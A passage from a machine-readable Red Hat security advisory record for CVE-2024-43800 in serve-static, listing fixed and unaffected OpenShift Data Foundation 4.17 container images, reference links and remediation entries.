"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
